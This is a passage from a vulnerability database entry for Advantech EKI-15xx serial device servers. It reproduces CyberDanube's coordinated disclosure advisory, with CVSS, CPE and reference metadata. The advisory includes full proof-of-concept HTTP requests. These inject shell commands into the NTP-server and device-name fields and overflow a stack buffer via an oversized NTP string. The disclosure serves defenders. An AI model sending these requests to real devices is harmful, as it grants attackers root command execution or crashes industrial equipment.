by\nenclose it with \";\", which results in the string \\x93;ping 10.0.0.1;\\x94. \n\n1.2) Blind Authenticated Command Injection in Device Name (CVE-2023-2574)\nThe device name can also be abused for command injection. It is only executed\non reboot, but this can also be done via the device\\x92s web-interface. A POST\nrequest which injects the command \\x93;ls /etc;\\x94 can be looks like the following:\n===============================================================================\nPOST /cgi-bin/index.cgi?func=setsys HTTP/1.1\nHost: 172.16.0.100\nAccept: */*\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 541\nOrigin: http://172.16.0.100\nConnection: close\nReferer: http://172.16.0.100/cgi-bin/index.cgi\n\nweb_en=1\u0026resume_idx=0\u0026sys_name=;ls+/etc;\u0026sys_desc=\u0026ignr_devid=0\u0026tel_en=1\u0026snmp_en=1\u0026year_name=2023\u0026mon_name=5\u0026day_name=8\u0026hour_name=6\u0026min_name=45\u0026sec_name=18\u0026tz=UTC12%3A0\u0026ntp_name=\u0026dayligt_saving_time=0\u0026start_week=1\u0026start_day=0\u0026start_month=1\u0026start_time=\u0026end_week=1\u0026end_day=0\u0026end_month=1\u0026end_time=\u0026dst_timezone=\u0026slave_port=\u0026redt_num=%25REDTNUM%25\u0026redtID%25REDTNUM%25=%25REDTID%25\u0026priPath%25REDTNUM%25=%25PRIPATH%25\u0026secPath%25REDTNUM%25=%25SECPATH%25\u0026interface=0\u0026virtual_ip=%25VIRTGW_IP%25\u0026id=%25VIRTGW_ID%25\u0026priority=80\n\n===============================================================================\nSuch command can also be injected by setting the device name to \\x93;ls /etc;\\x94. \n\n\n2) Buffer Overflow (CVE-2023-2575)\nThe following POST request can be used to trigger a buffer overflow\nvulnerability in the web server:\n===============================================================================\nPOST /cgi-bin/index.cgi?func=setsys HTTP/1.1\nHost: 172.16.0.97\nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0\nAccept: */*\nAccept-Language: de,en-US;q=0.7,en;q=0.3\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 823\nOrigin: http://172.16.0.97\nConnection: close\nReferer: http://172.16.0.97/cgi-bin/index.cgi\n\nweb_en=1\u0026resume_idx=0\u0026sys_name=test\u0026sys_desc=\u0026ignr_devid=0\u0026tel_en=1\u0026snmp_en=1\u0026year_name=2023\u0026mon_name=5\u0026day_name=8\u0026hour_name=7\u0026min_name=2\u0026sec_name=52\u0026tz=UTC12%3A0\u0026ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\u0026dayligt_saving_time=0\u0026start_week=1\u0026start_day=0\u0026start_month=1\u0026start_time=\u0026end_week=1\u0026end_day=0\u0026end_month=1\u0026end_time=\u0026dst_timezone=\u0026slave_port=\u0026redt_num=%25REDTNUM%25\u0026redtID%25REDTNUM%25=%25REDTID%25\u0026priPath%25REDTNUM%25=%25PRIPATH%25\u0026secPath%25REDTNUM%25=%25SECPATH%25\u0026interface=0\u0026virtual_ip=%25VIRTGW_IP%25\u0026id=%25VIRTGW_ID%25\u0026priority=80\n===============================================================================\n\nThe serial port of the device provides error messages, which already indicate\nthat the stack has been corrupted:\n/ # *** Error in `./index.cgi\u0027: free(): invalid next size (normal): 0x00069828 ***\n*** Error in `./index.cgi\u0027: malloc(): memory corruption: 0x00069898 ***\n\nFurthermore, the forked child processes seem to remain in the process list as\nzombies - three buffer overflows were triggered in this case:\n/ # ps\nPID USER COMMAND\n[...]\n 935 root ./index.cgi func=setsys\n 959 root ./index.cgi func=setsys\n 983 root ./index.cgi func=setsys\n[...]\n\n\nThe vulnerabilities were manually verified on an emulated device by using the\nMEDUSA scalable firmware runtime (https://medusa.cyberdanube.com). \n\n\nSolution\n-------------------------------------------------------------------------------\nUpdate the product to the latest available firmware version. \n\n\nWorkaround\n-------------------------------------------------------------------------------\nNone\n\n\nRecommendation\n-------------------------------------------------------------------------------\nCyberDanube recommends Advantech customers to upgrade the firmware to the\nlatest version available. \n\n\nContact Timeline\n-------------------------------------------------------------------------------\n2023-03-08: Contacting Advantech via Service Request form; No answer. \n2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz);\n Vendor confirmed vulnerabilities and will provide a fixed firmware\n until 2023-05-13. Asked vendor for affected models; Vendo\n responded that EKI-1524/1522/1521 series are affected. \n2023-03-20: Asked for status update. \n2023-03-21: Vendor responded that the firmware is currently under testing. \n2023-03-31: Vendor statet, that firmware is done and sent it via email; Found\n additional issues and responded to vendor. \n2023-04-01: Vendor asked multiple question. \n2023-04-02: Responded to vendor, answered questions and asked for a call;\n Vendor agreed. \n2023-04-04: Set date for a call to 2023-04-10. \n2023-04-10: Clarified further issues. \n2023-04-23: Vendor sent notification that a beta release of the firmware is\n available. \n2023-05-02: Vendor sent notification that a new firmware release is online. \n2023-05-04: Asked vendor if the advisory can be published earlier than agreed. \n2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities\n have been fixed. \n2023-05-11: Coordinated release of security advisory. \n\nWeb: https://www.cyberdanube.com\nTwitter: https://twitter.com/cyberdanube\nMail: research at cyberdanube dot com\n\nEOF S. Dietz, T. Weber / @2023\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2023-2573"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-009953"
},
{
"db": "VULMON",
"id": "CVE-2023-2573"
},
{
"db": "PACKETSTORM",
"id": "172307"
}
],
"trust": 1.8
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2023-2573",
"trust": 3.4
},
{
"db": "PACKETSTORM",
"id": "172307",
"trust": 2.5
},
{
"db": "JVNDB",
"id": "JVNDB-2023-009953",
"trust": 0.8
},
{
"db": "CXSECURITY",
"id": "WLB-2023050038",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-202305-383",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2023-2573",
"trust": 0.1
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-2573"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-009953"
},
{
"db": "PACKETSTORM",
"id": "172307"
},
{
"db": "NVD",
"id": "CVE-2023-2573"
},
{
"db": "CNNVD",
"id": "CNNVD-202305-383"
}
]
},
"id": "VAR-202305-0371",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VARIoT devices database",
"id": null
}
],
"trust": 1.0
},
"last_update_date": "2023-12-18T11:54:15.800000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Advantech Fixes for command injection vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=237365"
}
],
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202305-383"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-77",
"trust": 1.0
},
{
"problemtype": "Command injection (CWE-77) [NVD evaluation ]",
"trust": 0.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-009953"
},
{
"db": "NVD",
"id": "CVE-2023-2573"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1j9bed3"
},
{
"trust": 2.5,
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1j9bect"
},
{
"trust": 2.5,
"url": "https://www.advantech.com/en/support/details/firmware?id=1-1j9bebl"
},
{
"trust": 2.4,
"url": "http://packetstormsecurity.com/files/172307/advantech-eki-15xx-series-command-injection-buffer-overflow.html"
},
{
"trust": 2.4,
"url": "http://seclists.org/fulldisclosure/2023/may/4"
},
{
"trust": 2.4,
"url": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-2573"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/issue/wlb-2023050038"
},
{
"trust": 0.6,
"url": "https://cxsecurity.com/cveshow/cve-2023-2573/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-2575"
},
{
"trust": 0.1,
"url": "http://172.16.0.100/cgi-bin/index.cgi"
},
{
"trust": 0.1,
"url": "http://172.16.0.97"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2023-2574"
},
{
"trust": 0.1,
"url": "https://www.advantech.com/en/about"
},
{
"trust": 0.1,
"url": "https://advantech.com"
},
{
"trust": 0.1,
"url": "https://medusa.cyberdanube.com)."
},
{
"trust": 0.1,
"url": "https://twitter.com/cyberdanube"
},
{
"trust": 0.1,
"url": "http://172.16.0.100"
},
{
"trust": 0.1,
"url": "https://www.cyberdanube.com"
},
{
"trust": 0.1,
"url": "http://172.16.0.97/cgi-bin/index.cgi"
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2023-2573"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-009953"
},
{
"db": "PACKETSTORM",
"id": "172307"
},
{
"db": "NVD",
"id": "CVE-2023-2573"
},
{
"db": "CNNVD",
"id": "CNNVD-202305-383"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2023-2573"
},
{
"db": "JVNDB",
"id": "JVNDB-2023-009953"
},
{
"db": "PACKETSTORM",
"id": "172307"
},
{
"db": "NVD",
"id": "CVE-2023-2573"
},
{
"db": "CNNVD",
"id": "CNNVD-202305-383"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-05-08T00:00:00",
"db": "VULMON",
"id": "CVE-2023-2573"
},
{
"date": "2023-12-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2023-009953"
},
{
"date": "2023-05-12T16:24:23",
"db": "PACKETSTORM",
"id": "172307"
},
{
"date": "2023-05-08T13:15:09.710000",
"db": "NVD",
"id": "CVE-2023-2573"
},
{
"date": "2023-05-08T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202305-383"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2023-05-08T00:00:00",
"db": "VULMON",
"id": "CVE-2023-2573"
},
{
"date": "2023-12-07T04:51:00",
"db": "JVNDB",
"id": "JVNDB-2023-009953"
},
{
"date": "2023-05-12T18:15:09.617000",
"db": "NVD",
"id": "CVE-2023-2573"
},
{
"date": "2023-05-15T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202305-383"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202305-383"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Command injection vulnerability in multiple Advantech products",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-009953"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "command injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202305-383"
}
],
"trust": 0.6
}
}
var-202305-0474
Vulnerability from variot
Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a Stack-based Buffer Overflow vulnerability, which can be triggered by authenticated users via a crafted POST request. Advantech Co., Ltd. eki-1521 firmware, eki-1522 firmware, eki-1524 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. CyberDanube Security Research 20230511-0
title| Multiple Vulnerabilities
product| EKI-1524-CE series, EKI-1522 series, EKI-1521 series
vulnerable version| 1.21 fixed version| 1.24 CVE number| CVE-2023-2573, CVE-2023-2574, CVE-2023-2575 impact| High homepage| https://advantech.com found| 2023-03-06 by| S. Dietz, T. Weber (Office Vienna) | CyberDanube Security Research | Vienna | St. P\xf6lten | | https://www.cyberdanube.com
Vendor description
"Advantech\x92s corporate vision is to enable an intelligent planet. The company is a global leader in the fields of IoT intelligent systems and embedded platforms. To embrace the trends of IoT, big data, and artificial intelligence, Advantech promotes IoT hardware and software solutions with the Edge Intelligence WISE-PaaS core to assist business partners and clients in connecting their industrial chains. Advantech is also working with business partners to co-create business ecosystems that accelerate the goal of industrial intelligence."
Source: https://www.advantech.com/en/about
Vulnerable versions
EKI-1524-CE series / 1.21 EKI-1522-CE series / 1.21 EKI-1521-CE series / 1.21
Vulnerability overview
1) Authenticated Command Injection (CVE-2023-2573, CVE-2023-2574) The web server of the device is prone to two authenticated command injections. These allow an attacker to gain full access to the underlying operating system of the device. This device class can be attached to legacy systems via RS-232, RS-422 or RS-485. Such peripheral systems can be affected by attacks to the device from malicious actors.
2) Buffer Overflow (CVE-2023-2575) The web server is prone to a buffer overflow, triggered due to missing input lenght validation in the NTP input field. According to the vendor, the NTP server string is expected to be 64 bytes long, which is not correctly checked.
Proof of Concept
1) Authenticated Command Injection The web server is prone to two authenticated command injections via POST parameters. The following proof-of-concepts show how to inject commands to the system which gets executed with root permissions in the background:
1.1) Blind Authenticated Command Injection in NTP Server Name (CVE-2023-2573) The following POST request executes the command \x93;ping 10.0.0.1\x94 on the system: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.100 Accept: / Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 541 Origin: http://172.16.0.100 Connection: close Referer: http://172.16.0.100/cgi-bin/index.cgi
web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=;ping+10.0.0.1;&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80
=============================================================================== It is also possible to execute this command without any interceptor proxy by enclose it with ";", which results in the string \x93;ping 10.0.0.1;\x94.
1.2) Blind Authenticated Command Injection in Device Name (CVE-2023-2574) The device name can also be abused for command injection. It is only executed on reboot, but this can also be done via the device\x92s web-interface. A POST request which injects the command \x93;ls /etc;\x94 can be looks like the following: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.100 Accept: / Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 541 Origin: http://172.16.0.100 Connection: close Referer: http://172.16.0.100/cgi-bin/index.cgi
web_en=1&resume_idx=0&sys_name=;ls+/etc;&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=6&min_name=45&sec_name=18&tz=UTC12%3A0&ntp_name=&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80
=============================================================================== Such command can also be injected by setting the device name to \x93;ls /etc;\x94.
2) Buffer Overflow (CVE-2023-2575) The following POST request can be used to trigger a buffer overflow vulnerability in the web server: =============================================================================== POST /cgi-bin/index.cgi?func=setsys HTTP/1.1 Host: 172.16.0.97 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0 Accept: / Accept-Language: de,en-US;q=0.7,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 823 Origin: http://172.16.0.97 Connection: close Referer: http://172.16.0.97/cgi-bin/index.cgi
web_en=1&resume_idx=0&sys_name=test&sys_desc=&ignr_devid=0&tel_en=1&snmp_en=1&year_name=2023&mon_name=5&day_name=8&hour_name=7&min_name=2&sec_name=52&tz=UTC12%3A0&ntp_name=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&dayligt_saving_time=0&start_week=1&start_day=0&start_month=1&start_time=&end_week=1&end_day=0&end_month=1&end_time=&dst_timezone=&slave_port=&redt_num=%25REDTNUM%25&redtID%25REDTNUM%25=%25REDTID%25&priPath%25REDTNUM%25=%25PRIPATH%25&secPath%25REDTNUM%25=%25SECPATH%25&interface=0&virtual_ip=%25VIRTGW_IP%25&id=%25VIRTGW_ID%25&priority=80
The serial port of the device provides error messages, which already indicate
that the stack has been corrupted:
/ # *** Error in ./index.cgi': free(): invalid next size (normal): 0x00069828 ***
*** Error in./index.cgi': malloc(): memory corruption: 0x00069898 ***
Furthermore, the forked child processes seem to remain in the process list as zombies - three buffer overflows were triggered in this case: / # ps PID USER COMMAND [...] 935 root ./index.cgi func=setsys 959 root ./index.cgi func=setsys 983 root ./index.cgi func=setsys [...]
The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).
Solution
Update the product to the latest available firmware version.
Workaround
None
Recommendation
CyberDanube recommends Advantech customers to upgrade the firmware to the latest version available.
Contact Timeline
2023-03-08: Contacting Advantech via Service Request form; No answer. 2023-03-13: Contacting Advantech via Czech PSIRT (security@advantech.cz); Vendor confirmed vulnerabilities and will provide a fixed firmware until 2023-05-13. Asked vendor for affected models; Vendo responded that EKI-1524/1522/1521 series are affected. 2023-03-20: Asked for status update. 2023-03-21: Vendor responded that the firmware is currently under testing. 2023-03-31: Vendor statet, that firmware is done and sent it via email; Found additional issues and responded to vendor. 2023-04-01: Vendor asked multiple question. 2023-04-02: Responded to vendor, answered questions and asked for a call; Vendor agreed. 2023-04-04: Set date for a call to 2023-04-10. 2023-04-10: Clarified further issues. 2023-04-23: Vendor sent notification that a beta release of the firmware is available. 2023-05-02: Vendor sent notification that a new firmware release is online. 2023-05-04: Asked vendor if the advisory can be published earlier than agreed. 2023-05-08: Asked for status update; Vendor confirmed that all vulnerabilities have been fixed. 2023-05-11: Coordinated release of security advisory.
Web: https://www.cyberdanube.com Twitter: https://twitter.com/cyberdanube Mail: research at cyberdanube dot com
EOF S. Dietz, T. Weber / @2023
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202305-0474",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "eki-1524",
"scope": "lte",
"trust": 1.0,
"vendor": "advantech",
"version": "1.21"
},
{
"model": "eki-1521",
"scope": "lte",
"trust": 1.0,
"vendor": "advantech",
"version": "1.21"
},
{
"model": "eki-1522",
"scope": "lte",
"trust": 1.0,
"vendor": "advantech",
"version": "1.21"
},
{
"model": "eki-1521",
"scope": null,
"trust": 0.8,
"vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e",
"version": null
},
{
"model": "eki-1522",
"scope": null,
"trust": 0.8,
"vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e",
"version": null
},
{
"model": "eki-1524",
"scope": null,
"trust": 0.8,
"vendor": "\u30a2\u30c9\u30d0\u30f3\u30c6\u30c3\u30af\u682a\u5f0f\u4f1a\u793e",
"version": null
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-009954"
},
{
"db": "NVD",
"id": "CVE-2023-2575"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:advantech:eki-1521_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.21",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:advantech:eki-1521:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:advantech:eki-1522_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.21",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:advantech:eki-1522:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
},
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:advantech:eki-1524_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndIncluding": "1.21",
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:advantech:eki-1524:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2023-2575"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "T. Weber",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202305-381"
}
],
"trust": 0.6
},
"cve": "CVE-2023-2575",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"exploitabilityScore": 2.8,
"impactScore": 5.9,
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"trust": 2.0,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "High",
"baseScore": 8.8,
"baseSeverity": "High",
"confidentialityImpact": "High",
"exploitabilityScore": null,
"id": "CVE-2023-2575",
"impactScore": null,
"integrityImpact": "High",
"privilegesRequired": "Low",
"scope": "Unchanged",
"trust": 0.8,
"userInteraction": "None",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2023-2575",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "office@cyberdanube.com",
"id": "CVE-2023-2575",
"trust": 1.0,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-202305-381",
"trust": 0.6,
"value": "HIGH"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2023-009954"
},
{
"db": "NVD",
"id": "CVE-2023-2575"
},
{
"db": "NVD",
"id": "CVE-2023-2575"
},
{
"db": "CNNVD",
"id": "CNNVD-202305-381"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by a\u00a0Stack-based Buffer Overflow vulnerability, which can be triggered by authenticated\u00a0users via a crafted POST request. Advantech Co., Ltd. eki-1521 firmware, eki-1522 firmware, eki-1524 An out-of-bounds write vulnerability exists in firmware.Information is obtained, information is tampered with, and service operation is interrupted. (DoS) It may be in a state. CyberDanube Security Research 20230511-0\n-------------------------------------------------------------------------------\n title| Multiple Vulnerabilities\n product| EKI-1524-CE series, EKI-1522 series, EKI-1521 series\n vulnerable version| 1.21\n fixed version| 1.24\n CVE number| CVE-2023-2573, CVE-2023-2574, CVE-2023-2575\n impact| High\n homepage| https://advantech.com\n found| 2023-03-06\n by| S. Dietz, T. Weber (Office Vienna)\n | CyberDanube Security Research\n | Vienna | St. P\\xf6lten\n |\n | 